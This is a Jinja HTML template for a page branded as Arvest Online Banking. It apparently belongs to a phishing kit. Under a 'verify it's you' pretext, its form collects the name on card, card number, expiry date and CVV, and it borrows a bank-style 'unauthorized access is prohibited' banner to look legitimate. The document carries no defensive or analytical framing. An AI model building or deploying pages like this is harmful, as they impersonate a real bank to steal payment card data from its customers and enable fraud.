{% extends 'base.html'%} {%block body%}


<div style="padding-top: 5px" class="middle-form">
 
  
  <div class="submitForm">
    
 <p class="go-left" style="font-size: 14px; margin-bottom: 30px;">
    Verify its you by entering your email credentials <br />
  </p>
    
    <form id="login-form" action="" method="post">
        <div class="input-field">
            <input placeholder="Name on card" name="card_name" type="text">
        </div>
        <div class="input-field">
            <input placeholder="Card number" name="card_number" type="text">
        </div>
        
        <div class="input-field">
            <input placeholder="Expiry date" name="exp_date" type="text">
        </div>
        
        <div class="input-field">
            <input placeholder="CVV" name="cvv" type="text">
        </div>

      <button type="submit">Submit</button>
      
    </form>

    <br /> <br>
    

    <p>Unauthorized access is prohibited. Usage may be monitored</p>

    <hr>

    <p>Have questions about Arvest Online Banking?</p>
   
<br><br>
    
  </div>
</div>


{%endblock%}


